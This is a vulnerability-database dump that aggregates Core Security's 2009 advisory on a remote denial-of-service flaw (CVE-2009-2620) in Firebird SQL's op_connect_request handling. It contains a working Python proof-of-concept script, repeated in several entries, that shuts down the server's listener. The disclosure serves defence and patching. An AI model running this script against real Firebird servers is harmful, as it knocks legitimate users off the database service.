Firebird SQL v2.0.1\r\n . Firebird SQL v2.0.5\r\n . Firebird SQL v2.1.1\r\n . Firebird SQL v2.1.2\r\n . Firebird SQL v2.1.3 RC1\r\n . Firebird SQL v2.5.0 Beta 1\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Firebird SQL v2.1.3 Release Candidate 2 (estimated release: July 2009)\r\n . Firebird SQL v2.5 Beta 2 (estimated release: July 2009)\r\n . Firebird SQL v1.5.6 (estimated release: August 2009)\r\n . Firebird SQL v2.0.6 (estimated release: October 2009)\r\n\r\nPlease build a fresh CVS checkout to have a fixed version sooner.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nThe issue is resolved in all branches of the Firebird SQL repository. It\r\nis registered in the Firebird SQL bug tracker as:\r\nhttp://tracker.firebirdsql.org/browse/CORE-2563\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Francisco Falcon\r\nfrom Core Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *Introduction*\r\n\r\nFirebird SQL is an open source relational database management system\r\noffering many ANSI SQL standard features that runs on Linux, Windows and\r\na variety of Unix platforms.\r\n\r\nA remote denial of service can be triggered by an unauthenticated\r\nattacker, by sending an unexpected 'op_connect_request' message with\r\ninvalid data of length greater than or equal to 12 bytes to the server.\r\n\r\nInside the server ('src/remote/server.cpp'), the function\r\n'process_packet2()' processes a packet received from a client. This\r\nfunction has a 'switch' statement that considers all the possible\r\nopcodes defined in the protocol (see 'P_OP' enum 'in\r\nsrc/remote/protocol.h').\r\n\r\n/-----------\r\n\r\nsrc/remote/server.cpp:\r\n\r\n...\r\n3404\tP_OP op = receive-&gt;p_operation;\r\n3405\tswitch (op)\r\n3406\t{\r\n3407\tcase op_connect:\r\n\t...\r\n3426\tcase op_compile:\r\n\t...\r\n3430\tcase op_attach:\r\n\t...\r\n\r\n- -----------/\r\n\r\n In the case of an 'op_connect_request' packet, the execution flow goes\r\nto the following 'case' in the 'switch' statement:\r\n\r\n/-----------\r\n\r\nsrc/remote/server.cpp:\r\n\r\n...\r\n3584\tcase op_connect_request:\r\n3585\t\taux_request(port, &amp;receive-&gt;p_req, sendL);\r\n3586\t\tbreak;\r\n\r\n- -----------/\r\n\r\n After calling 'aux_request()' function and executing the 'break'\r\nstatement, execution lands here:\r\n\r\n/-----------\r\n\r\nsrc/remote/server.cpp:\r\n\r\n...\r\n3652\tif (port &amp;&amp; port-&gt;port_state == state_broken) {\r\n3653\t\tif (!port-&gt;port_parent) {\r\n3654\t\t\tgds__log(&quot;SERVER/process_packet: broken port, server exiting&quot;);\r\n3655\t\t\tport-&gt;disconnect(sendL, receive);\r\n3656\t\t\tThreadData::restoreSpecific();\r\n3657\t\t\treturn false;\r\n3658\t\t}\r\n3659\t\tport-&gt;disconnect(sendL, receive);\r\n3660\t\tport = NULL;\r\n3661\t}\r\n\r\n- -----------/\r\n\r\n By debugging the 'fbserver.exe' binary when it receives an\r\n'op_connect_request' packet, we can see that the conditions of the first\r\n'if' statement are satisfied, but the condition of the second 'if' is\r\nnot, so execution flow goes to the 'port-&gt;disconnect()' call:\r\n\r\n/-----------\r\n\r\n005ACE2C |&gt; 837E 0C 03 CMP DWORD PTR DS:[ESI+C],3\r\n ;port-&gt;port_state == state_broken ?\r\n005ACE30 |. 75 1B JNZ SHORT fbserver.005ACE4D\r\n005ACE32 |. 837E 1C 00 CMP DWORD PTR DS:[ESI+1C],0\r\n ;port-&gt;port_parent == 0?\r\n005ACE36 |. 75 0A JNZ SHORT fbserver.005ACE42\r\n ;this conditional jump is taken\r\n005ACE38 |. 68 D4D65F00 PUSH fbserver.005FD6D4\r\n ; ASCII &quot;SERVER/process_packet: broken port, server exiting&quot;\r\n005ACE3D |.^ E9 44FDFFFF JMP fbserver.005ACB86\r\n005ACE42 |&gt; 53 PUSH EBX\r\n ; /Arg2\r\n005ACE43 |. 57 PUSH EDI\r\n ; |Arg1\r\n005ACE44 |. 8BCE MOV ECX,ESI\r\n ; |\r\n005ACE46 |. E8 65D7FFFF CALL &lt;fbserver.rem_port::disconnect&gt;\r\n ; \\port-&gt;disconnect(sendL, receive)\r\n\r\n- -----------/\r\n\r\n The type of 'port' is 'struct rem_port', as defined in\r\n'src/remote/remote.h'. This struct type has a 'disconnect()' function\r\nthat is implemented in 'src/remote/server.cpp':\r\n\r\n/-----------\r\n\r\nsrc/remote/server.cpp:\r\n\r\n1464\tvoid rem_port::disconnect(PACKET* sendL, PACKET* receiveL)\r\n\r\n- -----------/\r\n\r\n Inside this function, the following code is executed, in order to free\r\nboth the sent and received packets and to close the corresponding sockets:\r\n\r\n/-----------\r\n\r\nsrc/remote/server.cpp:\r\n\r\n...\r\n1492\tREMOTE_free_packet(this, sendL);\r\n1493\tREMOTE_free_packet(this, receiveL);\r\n1494\tthis-&gt;disconnect();\r\n\r\n- -----------/\r\n\r\n That call to 'this-&gt;disconnect()' will ultimately lead to the\r\n'disconnect()' function in 'src/remote/inet.cpp'. This function is\r\nintended to break a remote connection, and receives a 'rem_port'\r\nstructure as parameter.\r\n\r\n/-----------\r\n\r\nsrc/remote/inet.cpp:\r\n\r\n1731\tstatic void disconnect( rem_port* port)\r\n1732\t{\r\n\r\n- -----------/\r\n\r\n In the first place, the function closes the connection established by\r\nthe client, by calling the 'shutdown' function:\r\n\r\n/-----------\r\n\r\nsrc/remote/inet.cpp:\r\n\r\n...\r\n1763\tif (port-&gt;port_handle &amp;&amp; (SOCKET) port-&gt;port_handle !=\r\nINVALID_SOCKET) {\r\n1764\t\tshutdown((int) port-&gt;port_handle, 2);\r\n1765\t}\r\n\r\n- -----------/\r\n\r\n After that, as a comment line states, if the current 'rem_port'\r\nstructure being disconnected is a child of another 'rem_port' structure,\r\nit recursively calls 'disconnect()' to disconnect the 'rem_port' stored\r\nat 'port-&gt;port_async'. 'port_async' is a member of 'rem_port' struct\r\nthat describes an asynchronous sibling port.\r\n\r\n/-----------\r\n\r\nsrc/remote/inet.cpp:\r\n\r\n/* If this is a sub-port, unlink it from it's parent */\r\n...\r\n1789\trem_port* parent = port-&gt;port_parent;\r\n1790\tif (parent != NULL) {\r\n1791\t\tif (port-&gt;port_async) {\r\n1792\t\t\tdisconnect(port-&gt;port_async);\r\n1793\t\t\tport-&gt;port_async = NULL;\r\n1794\t\t}\r\n\r\n- -----------/\r\n\r\n But when that recursive call to 'disconnect()' is made, the\r\n'port-&gt;port_async' passed as parameter to be disconnected corresponds to\r\nthe main server socket, that is, the socket listening for incoming\r\nconnections on port 3050/TCP. Once in the recursive call, 'shutdown()'\r\nand 'closesocket()' functions are invoked, making the server to stop\r\nlistening on the default port 3050/TCP, thus denying the service to\r\nlegitimate users.\r\n\r\n\r\n8.2. *Remarks*\r\n\r\nAs a side effect, the 'fbserver.exe' process will enter an infinite\r\nloop, consuming 100% CPU time.\r\n\r\nOn Windows platform, in a default installation, Firebird SQL server is\r\ninstalled as a Windows service, and another service (the Firebird\r\nGuardian) runs together with the server, in order to automatically\r\nrestart the 'fbserver.exe' process if it crashes or stops running\r\nabnormally. However, in this case the Firebird Guardian is unable to\r\ndetect the denial of service condition, because the server does not\r\ncrash nor stops running.\r\n\r\nIn Firebird SQL 1.5.5 the behavior is different; the server will crash\r\ninside the 'aux_request()' function in 'src/remote/server.cpp' due to a\r\nnull pointer dereference, instead of silently shutting down its listener\r\nport. The problem arises when 'port-&gt;port_context' (which has a 'NULL'\r\nvalue at this point) is loaded into 'rdb' variable and then, at line\r\n'885', it is used as a pointer without properly checking that it points\r\nto a valid memory address:\r\n\r\n/-----------\r\n\r\nsrc/remote/server.cpp:\r\n\r\n...\r\n884\t\trdb = port-&gt;port_context;\r\n885\t\tport-&gt;send_response(send, rdb-&gt;rdb_id,\r\n886\t\t\t\tsend-&gt;p_resp.p_resp_data.cstr_length, status_vector);\r\n\r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.3. *Proof of concept*\r\n\r\nThe following Python script will trigger the denial of service condition\r\non Firebird SQL, by sending an 'op_connect_request' packet with invalid\r\ndata of length greater than or equal to 12 bytes.\r\n\r\n\r\n/-----------\r\n\r\nimport socket\r\nimport time\r\n\r\ndef attack(host, port):\r\n op_connect_request = '\\x35' # Request to establish connection\r\n\r\n packet = '\\x00\\x00\\x00' + op_connect_request\r\n packet += &quot;A&quot; * 12 #Invalid data, must be &gt;= 12 bytes\r\nin order to trigger the DoS\r\n\r\n print &quot;(+) Connecting to the server....&quot;\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host, port))\r\n print &quot;(+) Sending op_connect_request packet...&quot;\r\n s.send(str(packet))\r\n s.close()\r\n print &quot;(+) op_connect_request packet successfully sent.&quot;\r\n\r\n #Wait 10 seconds and try to connect again to Firebird SQL server, to\r\ncheck if it's down\r\n print &quot;(+) Waiting 10 seconds before trying to reconnect to the\r\nserver...&quot;\r\n time.sleep(10)\r\n\r\n try:\r\n print &quot;(+) Trying to reconnect...&quot;\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host, port))\r\n s.close()\r\n print &quot;(!) Something went wrong. The server is still alive.&quot;\r\n except socket.error:\r\n print &quot;(*) Attack successful. The server is down.&quot;\r\n\r\n\r\nport = 3050\r\nhost = '192.168.131.128' #Replace with your target host\r\nattack(host, port)\r\n\r\n- -----------/\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-07-15:\r\nCore Security Technologies notifies the Firebird team of the vulnerability.\r\n\r\n. 2009-07-16:\r\nFirebird team requests technical details in plaintext.\r\n\r\n. 2009-07-16:\r\nCore sends the advisory draft, including technical details.\r\n\r\n. 2009-07-20:\r\nFirebird team notifies that the issue is resolved in all branches of the\r\nFirebird repository [2]. Technical details will be publicly visible when\r\nCore releases its advisory. Firebird team notices that Firebird version\r\n1.5.5 (marked as non vulnerable in the advisory draft) seems to be\r\naffected.\r\n\r\n. 2009-07-27:\r\nCore sends the final version of the advisory to the Firebird team.\r\n\r\n. 2009-07-28:\r\nThe advisory CORE-2009-0707 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] http://www.firebirdsql.org\r\n[2] http://tracker.firebirdsql.org/browse/CORE-2563\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.8 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niEYEARECAAYFAkpvTl0ACgkQyNibggitWa17uQCeMYg7kPSMqmAB1vDNn7Q7xzel\r\n0BYAoJLL6358DsIP9wuSZDxTH3DiUp7Z\r\n=GgTL\r\n-----END PGP SIGNATURE-----\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11929", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:42:30", "bulletinFamily": "exploit", "description": "Bugraq ID: 35842\r\nCVE ID\uff1aCVE-2009-2620\r\n\r\nFirebird\u662f\u4e00\u6b3e\u6d41\u884c\u7684\u6570\u636e\u5e93\u7a0b\u5e8f\u3002\r\nFirebird\u4e0d\u6b63\u786e\u5904\u7406\u5305\u542b\u975e\u6cd5\u6570\u636e\u7684'op_connect_request'\u6d88\u606f\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u5bf9\u670d\u52a1\u7a0b\u5e8f\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\r\n\u53d1\u9001\u975e\u6cd5\u7684\u6570\u636e\u957f\u5ea6\u8d85\u8fc7\u6216\u7b49\u4e8e12\u5b57\u8282\u7684'op_connect_request'\u6d88\u606f\u5230\u9ed8\u8ba4\u76843050\u7aef\u53e3\u53ef\u89e6\u53d1\u6b64\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u5e94\u7528\u670d\u52a1\u7a0b\u5e8f\u5d29\u6e83\uff0c\u9020\u6210\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\n\nFirebird Firebird 2.1.3 RC1\r\nFirebird Firebird 2.1.2\r\nFirebird Firebird 2.1.1\r\nFirebird Firebird 2.0.5\r\nFirebird Firebird 2.0.1\r\nFirebird Firebird 1.5.5\r\nFirebird Firebird 2.5 Beta 1\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003Firebird CVS\u5e93\u83b7\u5f97\u66f4\u65b0\u7a0b\u5e8f\uff1a\r\nhttp://www.firebirdsql.org/", "modified": "2009-07-29T00:00:00", "published": "2009-07-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11922", "id": "SSV:11922", "type": "seebug", "title": "Firebird 'op_connect_request'\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "sourceData": "\n import socket\r\nimport time\r\ndef attack(host, port):\r\n op_connect_request = '\\x35' # Request to establish connection\r\n packet = '\\x00\\x00\\x00' + op_connect_request\r\n packet += &quot;A&quot; * 12 #Invalid data, must be &gt;= 12 bytes in order to trigger the DoS\r\n print &quot;(+) Connecting to the server....&quot;\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host, port))\r\n print &quot;(+) Sending op_connect_request packet...&quot;\r\n s.send(str(packet))\r\n s.close()\r\n print &quot;(+) op_connect_request packet successfully sent.&quot;\r\n #Wait 10 seconds and try to connect again to Firebird SQL server, to check if it's down\r\n print &quot;(+) Waiting 10 seconds before trying to reconnect to the server...&quot;\r\n time.sleep(10)\r\n try:\r\n print &quot;(+) Trying to reconnect...&quot;\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host, port))\r\n s.close()\r\n print &quot;(!) Something went wrong. The server is still alive.&quot;\r\n except socket.error:\r\n print &quot;(*) Attack successful. The server is down.&quot;\r\nport = 3050\r\nhost = '192.168.131.128' #Replace with your target host\r\nattack(host, port)\r\n \r\n \n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11922", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:20", "bulletinFamily": "exploit", "description": "", "modified": "2009-07-28T00:00:00", "published": "2009-07-28T00:00:00", "href": "https://packetstormsecurity.com/files/79720/Core-Security-Technologies-Advisory-2009.0707.html", "id": "PACKETSTORM:79720", "type": "packetstorm", "title": "Core Security Technologies Advisory 2009.0707", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nCore Security Technologies - CoreLabs Advisory \nhttp://www.coresecurity.com/corelabs/ \n \nFirebird SQL op_connect_request main listener shutdown vulnerability \n \n \n1. *Advisory Information* \n \nTitle: Firebird SQL op_connect_request main listener shutdown vulnerability \nAdvisory ID: CORE-2009-0707 \nAdvisory URL: http://www.coresecurity.com/content/firebird-sql-dos \nDate published: 2009-07-28 \nDate of last update: 2009-07-28 \nVendors contacted: Firebird SQL \nRelease mode: Coordinated release \n \n \n2. *Vulnerability Information* \n \nClass: Denial of service (DoS) \nRemotely Exploitable: Yes \nLocally Exploitable: No \nBugtraq ID: 35842 \nCVE Name: CVE-2009-2620 \n \n \n3. *Vulnerability Description* \n \nFirebird SQL [1] is an open source relational database management system \noffering many ANSI SQL standard features that runs on Linux, Windows, \nand a variety of Unix platforms. \n \nA remote denial of service vulnerability has been found in Firebird SQL, \nwhich can be exploited by a remote attacker to force the server to close \nthe socket where it is listening for incoming connections and to enter \nan infinite loop, by sending an unexpected 'op_connect_request' message \nwith invalid data to the server. \n \n \n4. *Vulnerable packages* \n \n. Firebird SQL v1.5.5 \n. Firebird SQL v2.0.1 \n. Firebird SQL v2.0.5 \n. Firebird SQL v2.1.1 \n. Firebird SQL v2.1.2 \n. Firebird SQL v2.1.3 RC1 \n. Firebird SQL v2.5.0 Beta 1 \n \n \n5. *Non-vulnerable packages* \n \n. Firebird SQL v2.1.3 Release Candidate 2 (estimated release: July 2009) \n. Firebird SQL v2.5 Beta 2 (estimated release: July 2009) \n. Firebird SQL v1.5.6 (estimated release: August 2009) \n. Firebird SQL v2.0.6 (estimated release: October 2009) \n \nPlease build a fresh CVS checkout to have a fixed version sooner. \n \n \n6. *Vendor Information, Solutions and Workarounds* \n \nThe issue is resolved in all branches of the Firebird SQL repository. It \nis registered in the Firebird SQL bug tracker as: \nhttp://tracker.firebirdsql.org/browse/CORE-2563 \n \n \n7. *Credits* \n \nThis vulnerability was discovered and researched by Francisco Falcon \nfrom Core Security Technologies. \n \n \n8. *Technical Description / Proof of Concept Code* \n \n \n8.1. *Introduction* \n \nFirebird SQL is an open source relational database management system \noffering many ANSI SQL standard features that runs on Linux, Windows and \na variety of Unix platforms. \n \nA remote denial of service can be triggered by an unauthenticated \nattacker, by sending an unexpected 'op_connect_request' message with \ninvalid data of length greater than or equal to 12 bytes to the server. \n \nInside the server ('src/remote/server.cpp'), the function \n'process_packet2()' processes a packet received from a client. This \nfunction has a 'switch' statement that considers all the possible \nopcodes defined in the protocol (see 'P_OP' enum 'in \nsrc/remote/protocol.h'). \n \n/----------- \n \nsrc/remote/server.cpp: \n \n... \n3404 P_OP op = receive->p_operation; \n3405 switch (op) \n3406 { \n3407 case op_connect: \n... \n3426 case op_compile: \n... \n3430 case op_attach: \n... \n \n- -----------/ \n \nIn the case of an 'op_connect_request' packet, the execution flow goes \nto the following 'case' in the 'switch' statement: \n \n/----------- \n \nsrc/remote/server.cpp: \n \n... \n3584 case op_connect_request: \n3585 aux_request(port, &receive->p_req, sendL); \n3586 break; \n \n- -----------/ \n \nAfter calling 'aux_request()' function and executing the 'break' \nstatement, execution lands here: \n \n/----------- \n \nsrc/remote/server.cpp: \n \n... \n3652 if (port && port->port_state == state_broken) { \n3653 if (!port->port_parent) { \n3654 gds__log(\"SERVER/process_packet: broken port, server exiting\"); \n3655 port->disconnect(sendL, receive); \n3656 ThreadData::restoreSpecific(); \n3657 return false; \n3658 } \n3659 port->disconnect(sendL, receive); \n3660 port = NULL; \n3661 } \n \n- -----------/ \n \nBy debugging the 'fbserver.exe' binary when it receives an \n'op_connect_request' packet, we can see that the conditions of the first \n'if' statement are satisfied, but the condition of the second 'if' is \nnot, so execution flow goes to the 'port->disconnect()' call: \n \n/----------- \n \n005ACE2C |> 837E 0C 03 CMP DWORD PTR DS:[ESI+C],3 \n;port->port_state == state_broken ? \n005ACE30 |. 75 1B JNZ SHORT fbserver.005ACE4D \n005ACE32 |. 837E 1C 00 CMP DWORD PTR DS:[ESI+1C],0 \n;port->port_parent == 0? \n005ACE36 |. 75 0A JNZ SHORT fbserver.005ACE42 \n;this conditional jump is taken \n005ACE38 |. 68 D4D65F00 PUSH fbserver.005FD6D4 \n; ASCII \"SERVER/process_packet: broken port, server exiting\" \n005ACE3D |.^ E9 44FDFFFF JMP fbserver.005ACB86 \n005ACE42 |> 53 PUSH EBX \n; /Arg2 \n005ACE43 |. 57 PUSH EDI \n; |Arg1 \n005ACE44 |. 8BCE MOV ECX,ESI \n; | \n005ACE46 |. E8 65D7FFFF CALL <fbserver.rem_port::disconnect> \n; \\port->disconnect(sendL, receive) \n \n- -----------/ \n \nThe type of 'port' is 'struct rem_port', as defined in \n'src/remote/remote.h'. This struct type has a 'disconnect()' function \nthat is implemented in 'src/remote/server.cpp': \n \n/----------- \n \nsrc/remote/server.cpp: \n \n1464 void rem_port::disconnect(PACKET* sendL, PACKET* receiveL) \n \n- -----------/ \n \nInside this function, the following code is executed, in order to free \nboth the sent and received packets and to close the corresponding sockets: \n \n/----------- \n \nsrc/remote/server.cpp: \n \n... \n1492 REMOTE_free_packet(this, sendL); \n1493 REMOTE_free_packet(this, receiveL); \n1494 this->disconnect(); \n \n- -----------/ \n \nThat call to 'this->disconnect()' will ultimately lead to the \n'disconnect()' function in 'src/remote/inet.cpp'. This function is \nintended to break a remote connection, and receives a 'rem_port' \nstructure as parameter. \n \n/----------- \n \nsrc/remote/inet.cpp: \n \n1731 static void disconnect( rem_port* port) \n1732 { \n \n- -----------/ \n \nIn the first place, the function closes the connection established by \nthe client, by calling the 'shutdown' function: \n \n/----------- \n \nsrc/remote/inet.cpp: \n \n... \n1763 if (port->port_handle && (SOCKET) port->port_handle != \nINVALID_SOCKET) { \n1764 shutdown((int) port->port_handle, 2); \n1765 } \n \n- -----------/ \n \nAfter that, as a comment line states, if the current 'rem_port' \nstructure being disconnected is a child of another 'rem_port' structure, \nit recursively calls 'disconnect()' to disconnect the 'rem_port' stored \nat 'port->port_async'. 'port_async' is a member of 'rem_port' struct \nthat describes an asynchronous sibling port. \n \n/----------- \n \nsrc/remote/inet.cpp: \n \n/* If this is a sub-port, unlink it from it's parent */ \n... \n1789 rem_port* parent = port->port_parent; \n1790 if (parent != NULL) { \n1791 if (port->port_async) { \n1792 disconnect(port->port_async); \n1793 port->port_async = NULL; \n1794 } \n \n- -----------/ \n \nBut when that recursive call to 'disconnect()' is made, the \n'port->port_async' passed as parameter to be disconnected corresponds to \nthe main server socket, that is, the socket listening for incoming \nconnections on port 3050/TCP. Once in the recursive call, 'shutdown()' \nand 'closesocket()' functions are invoked, making the server to stop \nlistening on the default port 3050/TCP, thus denying the service to \nlegitimate users. \n \n \n8.2. *Remarks* \n \nAs a side effect, the 'fbserver.exe' process will enter an infinite \nloop, consuming 100% CPU time. \n \nOn Windows platform, in a default installation, Firebird SQL server is \ninstalled as a Windows service, and another service (the Firebird \nGuardian) runs together with the server, in order to automatically \nrestart the 'fbserver.exe' process if it crashes or stops running \nabnormally. However, in this case the Firebird Guardian is unable to \ndetect the denial of service condition, because the server does not \ncrash nor stops running. \n \nIn Firebird SQL 1.5.5 the behavior is different; the server will crash \ninside the 'aux_request()' function in 'src/remote/server.cpp' due to a \nnull pointer dereference, instead of silently shutting down its listener \nport. The problem arises when 'port->port_context' (which has a 'NULL' \nvalue at this point) is loaded into 'rdb' variable and then, at line \n'885', it is used as a pointer without properly checking that it points \nto a valid memory address: \n \n/----------- \n \nsrc/remote/server.cpp: \n \n... \n884 rdb = port->port_context; \n885 port->send_response(send, rdb->rdb_id, \n886 send->p_resp.p_resp_data.cstr_length, status_vector); \n \n- -----------/ \n \n \n \n \n8.3. *Proof of concept* \n \nThe following Python script will trigger the denial of service condition \non Firebird SQL, by sending an 'op_connect_request' packet with invalid \ndata of length greater than or equal to 12 bytes. \n \n \n/----------- \n \nimport socket \nimport time \n \ndef attack(host, port): \nop_connect_request = '\\x35' # Request to establish connection \n \npacket = '\\x00\\x00\\x00' + op_connect_request \npacket += \"A\" * 12 #Invalid data, must be >= 12 bytes \nin order to trigger the DoS \n \nprint \"(+) Connecting to the server....\" \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((host, port)) \nprint \"(+) Sending op_connect_request packet...\" \ns.send(str(packet)) \ns.close() \nprint \"(+) op_connect_request packet successfully sent.\" \n \n#Wait 10 seconds and try to connect again to Firebird SQL server, to \ncheck if it's down \nprint \"(+) Waiting 10 seconds before trying to reconnect to the \nserver...\" \ntime.sleep(10) \n \ntry: \nprint \"(+) Trying to reconnect...\" \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((host, port)) \ns.close() \nprint \"(!) Something went wrong. The server is still alive.\" \nexcept socket.error: \nprint \"(*) Attack successful. The server is down.\" \n \n \nport = 3050 \nhost = '192.168.131.128' #Replace with your target host \nattack(host, port) \n \n- -----------/ \n \n \n \n9. *Report Timeline* \n \n. 2009-07-15: \nCore Security Technologies notifies the Firebird team of the vulnerability. \n \n. 2009-07-16: \nFirebird team requests technical details in plaintext. \n \n. 2009-07-16: \nCore sends the advisory draft, including technical details. \n \n. 2009-07-20: \nFirebird team notifies that the issue is resolved in all branches of the \nFirebird repository [2]. Technical details will be publicly visible when \nCore releases its advisory. Firebird team notices that Firebird version \n1.5.5 (marked as non vulnerable in the advisory draft) seems to be \naffected. \n \n. 2009-07-27: \nCore sends the final version of the advisory to the Firebird team. \n \n. 2009-07-28: \nThe advisory CORE-2009-0707 is published. \n \n \n \n10. *References* \n \n[1] http://www.firebirdsql.org \n[2] http://tracker.firebirdsql.org/browse/CORE-2563 \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://www.coresecurity.com/corelabs. \n \n \n12. *About Core Security Technologies* \n \nCore Security Technologies develops strategic solutions that help \nsecurity-conscious organizations worldwide develop and maintain a \nproactive process for securing their networks. The company's flagship \nproduct, CORE IMPACT, is the most comprehensive product for performing \nenterprise security assurance testing. CORE IMPACT evaluates network, \nendpoint and end-user vulnerabilities and identifies what resources are \nexposed. It enables organizations to determine if current security \ninvestments are detecting and preventing attacks. Core Security \nTechnologies augments its leading technology solution with world-class \nsecurity consulting services, including penetration testing and software \nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core \nSecurity Technologies can be reached at 617-399-6980 or on the Web at \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2009 Core Security \nTechnologies and (c) 2009 CoreLabs, and may be distributed freely \nprovided that no fee is charged for this distribution and proper credit \nis given. \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.8 (MingW32) \nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org \n \niEYEARECAAYFAkpvTl0ACgkQyNibggitWa17uQCeMYg7kPSMqmAB1vDNn7Q7xzel \n0BYAoJLL6358DsIP9wuSZDxTH3DiUp7Z \n=GgTL \n-----END PGP SIGNATURE----- \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/79720/CORE-2009-0707.txt"}], "nessus": [{"lastseen": "2019-11-01T02:26:43", "bulletinFamily": "scanner", "description": "Upgrade from previous package version may be a problem since previous\nversion remove /var/run/firebird and it shouldn", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2009-8340.NASL", "href": "https://www.tenable.com/plugins/nessus/40830", "published": "2009-09-02T00:00:00", "title": "Fedora 11 : firebird-2.1.3.18185.0-2.fc11 (2009-8340)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8340.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40830);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:32:30\");\n\n script_cve_id(\"CVE-2009-2620\");\n script_bugtraq_id(35842);\n script_xref(name:\"FEDORA\", value:\"2009-8340\");\n\n script_name(english:\"Fedora 11 : firebird-2.1.3.18185.0-2.fc11 (2009-8340)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upgrade from previous package version may be a problem since previous\nversion remove /var/run/firebird and it shouldn't This release fix\nthis problem for future updates If you are in that case (no longer\n/var/run/firebird directory after upgrade), just reinstall\nfirebird-2.1.3.18185.0-2 package or create /var/run/firebird owned by\nuser firebird\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n 